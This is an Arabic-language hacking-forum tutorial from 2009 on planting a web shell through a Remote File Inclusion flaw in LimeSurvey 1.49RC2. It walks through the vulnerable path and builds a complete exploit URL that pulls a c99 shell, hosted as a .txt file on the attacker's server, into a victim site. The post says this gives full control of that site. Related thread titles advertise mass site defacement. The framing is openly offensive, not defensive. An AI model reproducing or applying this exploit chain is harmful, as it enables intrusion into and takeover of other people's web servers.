طرق رفع الشل الجزء 2

طرق رفع الشل الجزء 2


النتائج 1 إلى 10 من 31

الموضوع: طرق رفع الشل الجزء 2

مشاهدة المواضيع

المشاركة السابقة المشاركة السابقة   المشاركة التالية المشاركة التالية
  1. 10-04-2009, 06:43 PM #1
    BLACK.JaGuAr
    BLACK.JaGuAr غير متواجد حالياً
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri طرق رفع الشل الجزء 2


    كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....


    - رفع الشيل عبر ثغرات File Include فايل إنكلود -


    اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع




    أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :



    كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...

    طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
    1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
    كود:
    Type : RFI(Remote File Include)
    أي ثغره من نوع فايل إنكلود .

    2- اسم السكربت المصاب :
    كود:
    ****** name : LimeSurvey (PHPSurveyor)
    3-الإصدار المصاب وهو :
    كود:
    Version : 1.49RC2


    المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
    كود:
    /admin/classes/pear/OLE/PPS/File.php?homedir=[****l]


    الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
    كود:
    http://victim.com
    والسكربت المصاب والإصدار هو :
    كود:
    LimeSurvey والإصدار 1.49RC2
    وهو راكب عليه هكذا :
    كود:
    http://victim.com/ls


    إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
    كود:
    http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]


    بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
    كود:
    http://mysite.com/black/c99.txt
    لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل




    وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :


    كود:
    http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://mysite.com/black/c99.txt?
    وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
    كود:
    http://mysite.com/black/c99.txt
    داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..



    وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله


    ودمتم سالمين
    التعديل الأخير تم بواسطة BLACK.JaGuAr ; 10-08-2009 الساعة 06:18 PM

    I love Yemen



    رد مع اقتباس رد مع اقتباس
« [benzaxoll] كسر البرايفت : شرح اختراق ألاف المواقع ووضع انجازك بمئات الاختراقات | دورة h-t »

المواضيع المتشابهه

  1. شل r57 شغال رابط الشل ومحتوى الشل في نوتباد رابط 100%100
    بواسطة ikuwaite في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 75
    آخر مشاركة: 11-26-2012, 07:22 PM
  2. موسوعة أوامر الشل + لينكس ( الجزء الأول )
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 4
    آخر مشاركة: 02-29-2012, 10:00 PM
  3. طرق رفع الشل الجزء 1
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 245
    آخر مشاركة: 12-16-2011, 03:40 PM
  4. موسوعة أوامر الشل + لينكس ( الجزء الثاني )
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 5
    آخر مشاركة: 12-15-2011, 01:15 PM
  5. رفع الشل + ملف الشل + طريقة الدخول اليه
    بواسطة الحريف في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 12
    آخر مشاركة: 09-17-2010, 10:28 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

قوانين المنتدى